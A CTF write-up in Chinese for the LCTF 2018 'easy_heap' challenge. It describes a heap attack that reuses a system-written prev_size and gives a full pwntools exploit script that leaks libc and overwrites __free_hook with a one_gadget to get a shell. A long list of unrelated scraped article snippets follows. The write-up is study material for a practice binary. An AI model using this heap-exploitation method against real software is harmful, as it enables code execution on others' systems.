Sadmess
Sadmess

Lctf 2018 easy_heap

题目分析

学长(衣食父母)出的题当然要好好分析了,不看ctfwiki我也分析不明白
在没有办法手动写入 prev_size ,但又必须使用 prev_size 才可以进行利用的情况下,考虑使用系统写入的 prev_size 。

方法为:在 unsorted bin 合并时会写入 prev_size,而该 prev_size 不会被轻易覆盖(除非有新的 prev_size 需要写入),所以可以利用该 prev_size 进行利用。

攻击流程

  • 将 A -> B -> C 三块 unsorted bin chunk 依次进行释放
  • A 和 B 合并,此时 C 前的 prev_size 写入为 0x200
  • A 、 B 、 C 合并,步骤 2 中写入的 0x200 依然保持
  • 利用 unsorted bin 切分,分配出 A
  • 利用 unsorted bin 切分,分配出 B,注意此时不要覆盖到之前的 0x200
  • 将 A 再次释放为 unsorted bin 的堆块,使得 fd 和 bk 为有效链表指针
  • 此时 C 前的 prev_size 依然为 0x200(未使用到的值),A B C 的情况: A (free) -> B (allocated) -> C (free),如果使得 B -- 进行溢出,则可以将已分配的 B 块包含在合并后的释放状态 unsorted bin 块中。

但是在这个过程中需要注意 tcache 的影响。

#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
import sys
import os
import os.path
from pwn import *
#context(os='linux', arch='amd64', log_level='debug')

p = process('./easy_heap')

def cmd(idx):
    p.recvuntil('>')
    p.sendline(str(idx))


def new(size, content):
    cmd(1)
    p.recvuntil('>')
    p.sendline(str(size))
    p.recvuntil('> ')
    if len(content) >= size:
        p.send(content)
    else:
        p.sendline(content)


def delete(idx):
    cmd(2)
    p.recvuntil('index \n> ')
    p.sendline(str(idx))


def show(idx):
    cmd(3)
    p.recvuntil('> ')
    p.sendline(str(idx))
    return p.recvline()[:-1]


def main():
    # Your exploit script goes here

    # step 1: get three unsortedbin chunks
    # note that to avoid top consolidation, we need to arrange them like:
    # tcache * 6 -> unsortd  * 3 -> tcache
    for i in range(7):
        new(0x10, str(i) + ' - tcache')

    for i in range(3):
        new(0x10, str(i + 7) + ' - unsorted') # three unsorted bin chunks

    # arrange:
    for i in range(6):
        delete(i)
    delete(9)   #第十个块是tcache防合并块
    for i in range(6, 9):
        delete(i)  #设置第二个块的presize为0x200

    # step 2: use unsorted bin to overflow, and do unlink, trigger consolidation (overecvlineap)
    for i in range(7):
        new(0x10, str(i) + ' - tcache')

    # rearrange to take second unsorted bin into tcache chunk, but leave first 
    # unsorted bin unchanged
    new(0x10, '7 - first')
    new(0x10, '8 - second')
    new(0x10, '9 - third')

    for i in range(6):
        delete(i)
    # move second into tcache
    delete(8)
    # delete first to provide valid fd & bk
    delete(7)  

    new(0xf8, '0 - overflow')  #跳过presize直接设置size的inuse为0
    
    # fill up tcache
    delete(6)

    # trigger
    delete(9)

    # step 3: leak, fill up 
    for i in range(7):
        new(0x10, str(i) + ' - tcache')
    new(0x10, '8 - fillup')

    libc_leak = u64(show(0).strip().ljust(8, '\x00'))
    p.info('libc leak {}'.format(hex(libc_leak)))
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    libc.address = libc_leak - 0x3ebca0
    one_gadget = libc.address + 324386 
    # step 4: constrecvuntilct UAF, write into __free_hook
    new(0x10, '9 - next')
    
    # these two provides sendlineots for tcache
    delete(2)  #多释放一个,因为后面申请的时候最后一个可控地址块是第三个,ctfwiki这里有一点小问题
    delete(0)
    delete(9)
    new(0x10, p64(libc.symbols['__free_hook'])) # 0
    new(0x10, '')
    new(0x10, p64(one_gadget))
    delete(1)

    p.interactive()

if __name__ == '__main__':
    main()

你可能感兴趣的:(Lctf 2018 easy_heap)

  • 高效率慢生活第40天【失误】 Sunshine_0613
    早安~有多自律就有多自由❤永远爱自己,尊重自己。时间:2018.12.28日23:30晨起时间:6:30自问:1、你准备过好今天了么?美好的一天的大概是这样的。早上自然醒来,精神状态饱满,精力充沛而不是身心疲惫。起床洗涑好后,把一天重要的学习内容进行学习和打卡,完成任务,穿上干净漂亮的衣服,在绿色公园呼吸新鲜的空气,做健身操,全身心放松,舒适,去吃上最爱的早餐店,幸福吃早餐,早早来到公司化上美美的
  • 工作日志 樱花树下_e526
    总结上午整理了一下笔记,添加了一些工作原则性的问题,写下来提醒自己不能再犯。下午打了陌电电话,有个好聊的,暂时也不会来住院,不同意加微信,发了介绍医院的短信。还有个是公费的,说在我们这边报销不可的。其他的都不怎么好聊,聊几句就挂电话了。20180918苏洪颖
  • 2018-12-22 迎风展翅
    打麻将精神江荣芳谁叫随到从不拖拖拉拉不在乎工作环境专心致志不抱怨经常反省自己唉又错了永不言败推倒再来牌好牌坏一样努力往更好的方向整不管跟谁搭档照样努力对于工作中使用的工具从不挑剔一样顺手最主要是从不嫌弃工作时间长爽快输赢账目清楚不像生意场上拖拖欠欠用这样的精神去工作做事情这世上就没有什么工作干不好
  • 高手参照标准 实干作品
    2018年2月13日星期二高手三个标准强健的体魄钢铁般的意志绝对的责任感——转载分享就是传播爱和希望——微信公众号sgnote
  • Pycharm下载链接 Aderic 杂陈
    人生苦短,我用python3.4https://download.jetbrains.8686c.com/python/pycharm-community-2018.1.1.tar.gz后续更新可能就是后面版本号码稍微差异,mark!
  • 2018-01-12 邓启旭邓君浩妈妈
    昨天下了一天的雪,今天天特别的晴,空气也特别的清新,虽然有点冷,但是给人感觉很舒服。屋檐下的冰溜子在阳光的照耀下闪闪发光,漂亮极了,真是好多年没见到过了。图片发自App虽然阳光很好,但是大部分雪还是没化,路上一片白茫茫的。趁着中午暖和带着二宝出来玩一会,也让他感受一下大雪。小家伙一出门看到雪上去就踩,一点也没有害怕的意思,倒是我紧跟后边保护着,就怕他滑倒摔着。这本来心思让他出来玩一小会就行,没想到
  • 公开日记147:阳光的味道还是那样沁心…… 冥修人
    2018.9.21星期五晴1今天是这周的最后一天了,对于一个学生来说,中秋佳节的到来,让很多人都有了期待,不过大家可能更期待接下来一周的国庆吧!记得大一那个中秋还是在军训中度过的,那时候我们宿舍还有个小圆桌,可以一起吃饭、桌游,不亦乐乎!不得不说,时间还真是快啊,一眨眼三年过去了,可能是时间快就是这个时代的标志吧。2今天回家时,顶着天上的大太阳,虽然秋天的太阳没有这么炙热,但是在无云的天空中也是一
  • 初来乍到,请相互揭短 左边的春天
    从2018年1月就知道了007,价格从199涨到了399,4月份终于报了名,说是以后还要涨价。当时通过一个蛮优秀的人士知道了007,自己也看到了周围一些成功的人,是从写文章慢慢积累自己的“粉丝”,再通过粉丝转化成“消费者”。也不可否认写作的确成为自我价值的体现,赚钱的一个渠道。一直没有报名的原因一是觉得自己坚持不下来,没有什么可以写的;二是认为自己又没有一技之长,又没有自己的品牌树立,不需要有“粉
  • 20180722【剽悍行动营8】DAY1 嘉宾分享——赵周《碎片化时代你最缺的知识管理五招》 英娟儿
    补课五、自己学习后的五个收获:1.区分两类知识管理:追求知识本身;追求致用与成长。2.便签学习法的三个维度:A用自己的语言重述信息(理解)A1描述自己相关经验(内化)A2规划自己的目标与行动3.一切不改变行动的知识管理都是浪费。也就是说,不管是何种知识管理,都要以行动为目的。4.信息和知识的区别,又一次听到这两个概念的区别。5.构建知识体系是知识管理的最高境界。三、自己需要改善的(三个方面):1.
  • 20180818《遇见心想事成的自己》读书笔记 苗苗聊成长
    读书时间:20180813-20180818此书主要分为两部分,第一部分是心想事成的秘密,第二部分是秘密后的秘密。看到这两个主题就想起,曾经有些时候,也会期盼着能够心想事成,让自己在困境中突围,然而往往不管用,上天总是不会给到你想要的东西。看了此书才恍然大悟,原来心想事成也有方法,也讲套路。秘密后的秘密,才是核心。在这个快餐式的时代,很多时候我们只学一些表面上的术,就想达成所愿,化解一切难题,往往
  • 小红书之城:移动互联网社区构架产品如何实现自我迭代 AlanBai
    “「一座虚拟的城市」,小红书这样定义自己的社区平台。在这座花费五年时间搭建起来的「城市」里,超过一亿用户就像居民,「潮起潮落,人来人往」,而小红书的思考,也围绕着如何吸引更多的「居民」,留下那些旅途中经过的「游客」,以及如何守住自己的「城市精神」展开。”在极客公园Rebuild2018科技创新峰会上,小红书首席产品官邓超发表了主题为《关于互联网社区的再定义与新发现——如何打造年轻人聚集的生活方式社
  • 20181207 旅一30王思宁
    1.在文章中我学到的重要概念:讲故事不要平铺直叙2.这篇中我学到的怦然心动词汇:facialrecognition刷脸smogfog雾霾3.本篇文章中我最喜欢的句子:Forgetthememories,continuetobelife,miss,justpassby.4.本周学习中我遇到的困难:东西太多,不知道从哪开始复习5.语伴给我的建议:好好复习吧,别挂科6.我的一些其他感受和收获:游戏的坑真
  • 日精进第三十五天 金缔尊周大生珠宝玉玉
    尊敬的李老师,智慧的马教授,亲爱的家人们:大家好,我是(刘翠平)刘总的人,今天是2018年9月17号我的日精进第三十五天,我们互相勉励,携手前行,每天进步一点点,距离成功便不远。比学习:学习同事的素转非技巧,如何打动顾客的心,让顾客成为我们的老顾客。比改变:只要进店看的都是要买的,相信家人相信自己是最棒的,大家互相帮助,互相加油!比付出:总监中午来给我们开会,给我们从专卖店调货来辛苦了。比感恩:感
  • 和柳明先生《七绝:大雪吟》 赵俊理
    和柳明先生《七绝:大雪吟》文/渔歌听海(赵俊理)玉絮多情大雪临,天南地北许追寻。风霜领略耕农苦,饱暖尝知孺子心!作于;2018年11月7日
  • 2018-10-24 幸好不是道德专家 远山的轮廓
    我不传播正能量,不分享善与道德,因为我自己还一肚子坏水呢!今天不得不写到一本"善书",因为找到了我欣赏这本书的一个点,我想表达出来。我平时是不喜欢看善书的,甚至都是绕着走的,因为里面不是一言堂式的道德说教,就是武断的业报恐吓,读起来真是又烦又厌。这本《责任与修养——青年男女的相处之道》,我在学校里看见好多次,同时有这么多本,那它不是某家长送的,就是学生一下子从某寺院请回来的。这种流通方式的,多是善
  • 亲子日记25 我死行了吧
    2018年10月13日.星期六.晴今天我和两个孩子都休息,我们三睡到9点多才起床,起来吃了点东西,姐姐开始写作业,先把周四晚上的作业补上,告诉她要写拼音,她说老师说从第一页开始写,我说,那你写吧,一会的功夫说写完了,从a写到了ui……,孩,你倒是省事,怎么简单怎么来……图片发自App我告诉她老师不是布置这个作业,她立马垮了脸,可怜兮兮的说,我已经写了很多了啊,怎么还有那么多!?我说,是啊,你为了偷
  • 生命中一束特别的光 抹茶阿白
    每个人的生命中都会有一束特别的光,这束光是信仰,激励着我们不断前进。谈谈我自己吧,我的生命中有两束特别的光。第一束:鞠婧祎。她是现在舞台上闪闪发光的偶像,是粉丝们的信仰。2018年我通过大火的古装影视剧《芸汐传》认识她。她饰演的韩芸汐,是一个活泼开朗的小丫头,也是一个温婉动人的王妃娘娘。当时也只是因为她的颜值而喜欢她,努力去了解她,从百度开始,至此,我开始关注她的作品。2019年《新白娘子传奇》开
  • 2018-09-06 晰姐吉祥
    姓名:王彬公司:杭州爵卓服饰有限公司(NE潮牌男装)【日精进打卡第68天】【知~学习】《六项精进》1遍共183遍《六项精进》通篇1遍共33遍《大学》1遍共135遍《经营十二条》0遍共11遍••••••【经典名句】人生的道路都是由心来描绘的,所以,无论自己处于多么严酷的境遇之中,心头都不应为悲观的思想所萦绕。——稻盛和夫【行~实践】一、修身:(对自己个人)1、学习英语两小时,打卡第七天;二、齐家:(
  • 接纳自己 晴岚85
    郑海燕焦点初级十期坚持分享第59天2018.8.9今天早上做完中药热敷回来的路上,我一直在心里默默的念叨着一句话:郑海燕你真是太棒了,你做事真有自己的想法,你真善于表达自己。这是我最想给自己说的话,也是我最渴望达到的目标,所以我在心里默默的念叨了快一百遍。念叨完我觉得自己内心生出了许多的力量。学习焦点有两个月了,虽然看书,分享,听课,都在坚持,但是最近半个月,我的情绪很低落,也许是生活的压力,也许
  • 公开日记40:纵然身处忧围之中,也不要忘记当初勇敢的自己…… 冥修人
    2018.6.6星期三晴我发现日记这种东西,就应该是事情和心情的结合体,最后在来个总结和感悟,记录下来的东西,在以后翻阅的时候就不会觉得突兀了。今天新到的字帖,稍微练习了一下,写着挺有感觉的,不过有个问题,我应该先练练楷书,再去练行楷,这下好了,我这写的笔画都不会了,有点蒙啊!……下午下课之后我就去了图书馆,本来打算是去写写字帖的,等到太阳落山之后去吃饭,可是宝宝发过来消息,想要找我聊天,我以为她
  • 2018-01-20 姜月萍
    目前市盈率主要分三种,静态、动态、滚动。举例分享区别:老王花300万买一套房子,租出去,按季度收房租。去年第一年,第一个季度收了2万,第二季度收了3万,第三个季度收了3万,第四个季度收了2万,全年房租累计收入是10万;今年第二年,第一个季度收了4万,第二个季度收了3万,第三个季度收了3万,第四个季度收了3万,全年房租累计收入是13万;明年第三年,根据经验判断预计收入是15万。假设现在是第二年的第三
  • 2018年的回想,我在中化的日子里 文学汇作者
    文/家奴又是一年岁尾,感觉日子过得飞快,嗖嗖嗖就逝去了,再想返回身去,追寻失去的光阴,已经变得遥不可及,日子就是一个过程,一旦远去,再难抓住,每一个人都有自己的日子,周而复始,有改变内容的,也有维持着原状,一成不变的,但日子不论怎么过,我们都有自己的目标,都有自己的追求,想要实现愿望,就需要不停地奋斗。我的2018年,是有意义,有收获的一年,感觉自己又有了进步,又获得了成长,一个人的学历可能几十年
  • 2018-07-27 梵音陈静
    图片发自App图片发自App图片发自App每次骑小蓝车心情都好好喔,因为很轻啊,可以说是没有对比就没有伤害了,小黄车百分之九十都像老爷车,蹬起来那费劲儿的,大腿都变粗了555...。最近看姚家园店的小伙伴嗖嗖出订金好生羡慕,她他们真的超棒超厉害哦⊙∀⊙!辛苦付出总是会有回报的!预祝明天姚家园店开盘大卖大吉大利一切顺利!我自己呢已经进入疲惫期两周左右了,虽然没有力气竭尽全力了但是要坚持尽力!
  • 2018-07-18 雨后彩虹816
    随笔随着年龄的变化,小时候那些童真消失了。八岁时,我向别人借了一个悠悠球,我总觉得,要是它能多转几秒该多好,于是,我“胡想”一真去,我竟想出一个“粘玻璃球”的办法,我把“珍藏”多年的玻璃球粘上去,用手掂了掂,还挺沉,我用手轻轻一甩,空转时间提高两倍!在一班时,我经常带一些小玩易儿到班上玩,引得好多人看,有的人说我的思维太怪了,有人说我太好玩了,还有人要借回去玩两天。多么奇妙的思维,它几乎每天都缠着
  • 纠结的周四 自律女神
    亲子日记第四十二篇2018.4.19星期四天气晴早上,一觉醒来,第一件事就是看看手机,看看昨天写的日记怎样了。也许是字里行间感动了编辑,竟然给投稿成功了一篇文章。心情,别提有多爽了,比穿了件新衣服还高兴,那是一种被认可的感觉,小小的成就感遍布了全身。开心的给全家人准备着爱心早餐,图片发自App荤的有点多,再加一份清淡的大米粥,一顿早餐大功告成。二十分钟后,爷俩都吃完了,我给老公打包了一些炸里脊,准
  • 我多想回到那一年 snail菇凉
    今天出于很偶然的原因又打开头条翻开以往收藏和点赞的文章,一路滑下来,从现在的考试,单词收藏,书单点赞到最后的关于高考,关于那年夏天发生的时事还有当时刷头条时偶然点开的吸引我注意力的文章散文,类型内容很多。从追星八卦,房屋装修,到各种鸡汤观点美文。忽然发现你所浏览的每一个网页都是有记忆的,它会记录下当时你最感兴趣的,最符合当下状态的头条新闻。就像在2018年夏天以前,我会无比期待高考的到来,所以总爱
  • 2018-06-24 行百里者半九十
    早上本该是精神抖擞的时刻,并不是所有人都是这样的。脸上挂着些许的疲惫,睡眼惺忪。总挂着一点点的睡意。感觉总也睡不醒似的,总期望着晚上能早点睡,早上能早点起。这样看来挺美的!现实总会让你完美错过,很多时候自己不会让自己这么轻而易举就实现。总会不到某个点,总不会休息的,还有手机需要玩。时间还没到,还可以在玩会儿,时间还早,还可以继续几分钟。
  • 干扰我们的是对事物的看法 胡晓会
    胡晓会河南漯河焦点网络初级九期学员2018.4.22坚持分享第57天在安全的环境下,人的大脑会产生新的健康的连线,会改善我们的思维模式语言模式行为模式,切断原生家庭带给我们不良的影响,而走一条健康的路。上午参加公益活动,下午带封闭小组,爱人输水也没有陪他去,晚上到家看他在做饭,就说自己饿的不行了,就进屋忙自己的事儿了,等了一会儿,听到外面叮叮当当,把饭菜放到,餐桌上的声音。就跑出去说:你也不叫我吃
  • 2020北京大学西班牙语语言文学考研详情介绍、必看经验指导 xxxedu666
    学习方式全日制招生人数2019拟招4人研究方向00.不区分研究方向考试科目①101思想政治理论②201英语一③620综合考试④844西班牙语语言文学复试线18年:总分330政治英语50/专业课9017年:总分330政治英语50/专业课9016年:总分340政治英语50/专业课902018录取闵逸菲初试分数386.5
  • 大美无言,女神节最美的“情话”就它了 萃辰天心书院
    爱美之心,人皆有之。而天下最美的女性莫过于母亲,最美的母爱莫过于无言之美!今天是女神节,愿天下每一位母亲都能拥有天地之无言大美!且听印竹、印安如是我说~如是我说2018.3.8印安说爱美之心,人皆有之。对于女性来说,须内外兼美,尤在气质。要追求美、发现美、欣赏美、享受美,学会诗意地栖居,做一个优雅的女人。印竹说女性之美莫过于母爱,而母爱之大美在于无言。《大学》有云:“如保赤子,以诚求之,虽不中不远
  • ASM系列五 利用TreeApi 解析生成Class lijingyao8206 ASM字节码动态生成ClassNodeTreeAPI
       前面CoreApi的介绍部分基本涵盖了ASMCore包下面的主要API及功能,其中还有一部分关于MetaData的解析和生成就不再赘述。这篇开始介绍ASM另一部分主要的Api。TreeApi。这一部分源码是关联的asm-tree-5.0.4的版本。          在介绍前,先要知道一点, Tree工程的接口基本可以完
  • 链表树——复合数据结构应用实例 bardo 数据结构树型结构表结构设计链表菜单排序
    我们清楚:数据库设计中,表结构设计的好坏,直接影响程序的复杂度。所以,本文就无限级分类(目录)树与链表的复合在表设计中的应用进行探讨。当然,什么是树,什么是链表,这里不作介绍。有兴趣可以去看相关的教材。 需求简介: 经常遇到这样的需求,我们希望能将保存在数据库中的树结构能够按确定的顺序读出来。比如,多级菜单、组织结构、商品分类。更具体的,我们希望某个二级菜单在这一级别中就是第一个。虽然它是最后
  • 为啥要用位运算代替取模呢 chenchao051 位运算哈希汇编
        在hash中查找key的时候,经常会发现用&取代%,先看两段代码吧,     JDK6中的HashMap中的indexFor方法: /** * Returns index for hash code h. */ static int indexFor(int h, int length) {
  • 最近的情况 麦田的设计者 生活感悟计划软考
          今天是2015年4月27号      整理一下最近的思绪以及要完成的任务             1、最近在驾校科目二练车,每周四天,练三周。其实做什么都要用心,追求合理的途径解决。为
  • PHP去掉字符串中最后一个字符的方法 IT独行者 PHP字符串
    今天在PHP项目开发中遇到一个需求,去掉字符串中的最后一个字符 原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6 代码如下: $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr;
  • hadoop在linux上单机安装过程 _wy_ linuxhadoop
    1、安装JDK     jdk版本最好是1.6以上,可以使用执行命令java -version查看当前JAVA版本号,如果报命令不存在或版本比较低,则需要安装一个高版本的JDK,并在/etc/profile的文件末尾,根据本机JDK实际的安装位置加上以下几行:    export JAVA_HOME=/usr/java/jdk1.7.0_25  
  • JAVA进阶----分布式事务的一种简单处理方法 无量 多系统交互分布式事务
    每个方法都是原子操作: 提供第三方服务的系统,要同时提供执行方法和对应的回滚方法 A系统调用B,C,D系统完成分布式事务 =========执行开始======== A.aa(); try { B.bb(); } catch(Exception e) { A.rollbackAa(); } try { C.cc(); } catch(Excep
  • 安墨移动广 告:移动DSP厚积薄发 引领未来广 告业发展命脉 矮蛋蛋 hadoop互联网
      “谁掌握了强大的DSP技术,谁将引领未来的广 告行业发展命脉。”2014年,移动广 告行业的热点非移动DSP莫属。各个圈子都在纷纷谈论,认为移动DSP是行业突破点,一时间许多移动广 告联盟风起云涌,竞相推出专属移动DSP产品。   到底什么是移动DSP呢?   DSP(Demand-SidePlatform),就是需求方平台,为解决广 告主投放的各种需求,真正实现人群定位的精准广
  • myelipse设置 alafqq IP
      在一个项目的完整的生命周期中,其维护费用,往往是其开发费用的数倍。因此项目的可维护性、可复用性是衡量一个项目好坏的关键。而注释则是可维护性中必不可少的一环。 注释模板导入步骤  安装方法: 打开eclipse/myeclipse 选择 window-->Preferences-->JAVA-->Code-->Code
  • java数组 百合不是茶 java数组
    java数组的   声明  创建  初始化;   java支持C语言      数组中的每个数都有唯一的一个下标 一维数组的定义 声明: int[] a = new int[3];声明数组中有三个数int[3] int[] a 中有三个数,下标从0开始,可以同过for来遍历数组中的数
  • javascript读取表单数据 bijian1013 JavaScript
    利用javascript读取表单数据,可以利用以下三种方法获取: 1、通过表单ID属性:var a = document.getElementByIdx_x_x("id"); 2、通过表单名称属性:var b = document.getElementsByName("name"); 3、直接通过表单名字获取:var c = form.content.
  • 探索JUnit4扩展:使用Theory bijian1013 javaJUnitTheory
    理论机制(Theory) 一.为什么要引用理论机制(Theory)         当今软件开发中,测试驱动开发(TDD — Test-driven development)越发流行。为什么 TDD 会如此流行呢?因为它确实拥有很多优点,它允许开发人员通过简单的例子来指定和表明他们代码的行为意图。 TDD 的优点:     &nb
  • [Spring Data Mongo一]Spring Mongo Template操作MongoDB bit1129 template
    什么是Spring Data Mongo Spring Data MongoDB项目对访问MongoDB的Java客户端API进行了封装,这种封装类似于Spring封装Hibernate和JDBC而提供的HibernateTemplate和JDBCTemplate,主要能力包括 1. 封装客户端跟MongoDB的链接管理 2. 文档-对象映射,通过注解:@Document(collectio
  • 【Kafka八】Zookeeper上关于Kafka的配置信息 bit1129 zookeeper
    问题: 1. Kafka的哪些信息记录在Zookeeper中 2. Consumer Group消费的每个Partition的Offset信息存放在什么位置 3. Topic的每个Partition存放在哪个Broker上的信息存放在哪里 4. Producer跟Zookeeper究竟有没有关系?没有关系!!!   //consumers、config、brokers、cont
  • java OOM内存异常的四种类型及异常与解决方案 ronin47 java OOM 内存异常
           OOM异常的四种类型:       一: StackOverflowError :通常因为递归函数引起(死递归,递归太深)。-Xss 128k 一般够用。        二: out Of memory: PermGen Space:通常是动态类大多,比如web 服务器自动更新部署时引起。-Xmx
  • java-实现链表反转-递归和非递归实现 bylijinnan java
    20120422更新: 对链表中部分节点进行反转操作,这些节点相隔k个: 0->1->2->3->4->5->6->7->8->9 k=2 8->1->6->3->4->5->2->7->0->9 注意1 3 5 7 9 位置是不变的。 解法: 将链表拆成两部分: a.0-&
  • Netty源码学习-DelimiterBasedFrameDecoder bylijinnan javanetty
    看DelimiterBasedFrameDecoder的API,有举例: 接收到的ChannelBuffer如下: +--------------+ | ABC\nDEF\r\n | +--------------+ 经过DelimiterBasedFrameDecoder(Delimiters.lineDelimiter())之后,得到: +-----+----
  • linux的一些命令 -查看cc攻击-网口ip统计等 hotsunshine linux
    Linux判断CC攻击命令详解 2011年12月23日 ⁄ 安全 ⁄ 暂无评论 查看所有80端口的连接数 netstat -nat|grep -i '80'|wc -l 对连接的IP按连接数量进行排序 netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 查看TCP连接状态 n
  • Spring获取SessionFactory ctrain sessionFactory
    String sql = "select sysdate from dual"; WebApplicationContext wac = ContextLoader.getCurrentWebApplicationContext(); String[] names = wac.getBeanDefinitionNames(); for(int i=0; i&
  • Hive几种导出数据方式 daizj hive数据导出
    Hive几种导出数据方式   1.拷贝文件   如果数据文件恰好是用户需要的格式,那么只需要拷贝文件或文件夹就可以。 hadoop fs –cp source_path target_path   2.导出到本地文件系统   --不能使用insert into local directory来导出数据,会报错 --只能使用
  • 编程之美 dcj3sjt126com 编程PHP重构
    我个人的 PHP 编程经验中,递归调用常常与静态变量使用。静态变量的含义可以参考 PHP 手册。希望下面的代码,会更有利于对递归以及静态变量的理解   header("Content-type: text/plain"); function static_function () { static $i = 0; if ($i++ < 1
  • Android保存用户名和密码 dcj3sjt126com android
    转自:http://www.2cto.com/kf/201401/272336.html 我们不管在开发一个项目或者使用别人的项目,都有用户登录功能,为了让用户的体验效果更好,我们通常会做一个功能,叫做保存用户,这样做的目地就是为了让用户下一次再使用该程序不会重新输入用户名和密码,这里我使用3种方式来存储用户名和密码 1、通过普通 的txt文本存储 2、通过properties属性文件进行存
  • Oracle 复习笔记之同义词 eksliang Oracle 同义词Oracle synonym
    转载请出自出处:http://eksliang.iteye.com/blog/2098861 1.什么是同义词       同义词是现有模式对象的一个别名。       概念性的东西,什么是模式呢?创建一个用户,就相应的创建了 一个模式。模式是指数据库对象,是对用户所创建的数据对象的总称。模式对象包括表、视图、索引、同义词、序列、过
  • Ajax案例 gongmeitao Ajaxjsp
    数据库采用Sql Server2005 项目名称为:Ajax_Demo 1.com.demo.conn包 package com.demo.conn; import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException; //获取数据库连接的类public class DBConnec
  • ASP.NET中Request.RawUrl、Request.Url的区别 hvt .netWebC#asp.nethovertree
      如果访问的地址是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree%3C&n=myslider#zonemenu那么Request.Url.ToString() 的值是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree<&
  • SVG 教程 (七)SVG 实例,SVG 参考手册 天梯梦 svg
    SVG 实例 在线实例 下面的例子是把SVG代码直接嵌入到HTML代码中。 谷歌Chrome,火狐,Internet Explorer9,和Safari都支持。 注意:下面的例子将不会在Opera运行,即使Opera支持SVG - 它也不支持SVG在HTML代码中直接使用。   SVG 实例 SVG基本形状 一个圆 矩形 不透明矩形 一个矩形不透明2 一个带圆角矩
  • 事务管理 luyulong javaspring编程事务
    事物管理 spring事物的好处 为不同的事物API提供了一致的编程模型 支持声明式事务管理 提供比大多数事务API更简单更易于使用的编程式事务管理API 整合spring的各种数据访问抽象 TransactionDefinition 定义了事务策略 int getIsolationLevel()得到当前事务的隔离级别 READ_COMMITTED 
  • 基础数据结构和算法十一:Red-black binary search tree sunwinner AlgorithmRed-black
      The insertion algorithm for 2-3 trees just described is not difficult to understand; now, we will see that it is also not difficult to implement. We will consider a simple representation known
  • centos同步时间 stunizhengjia linux集群同步时间
    做了集群,时间的同步就显得非常必要了。 以下是查到的如何做时间同步。 在CentOS 5不再区分客户端和服务器,只要配置了NTP,它就会提供NTP服务。 1)确认已经ntp程序包: # yum install ntp 2)配置时间源(默认就行,不需要修改) # vi /etc/ntp.conf server pool.ntp.o
  • ITeye 9月技术图书有奖试读获奖名单公布 ITeye管理员 ITeye
    ITeye携手博文视点举办的9月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 9月试读活动回顾:http://webmaster.iteye.com/blog/2118112本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀):      《NFC:Arduino、Andro
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他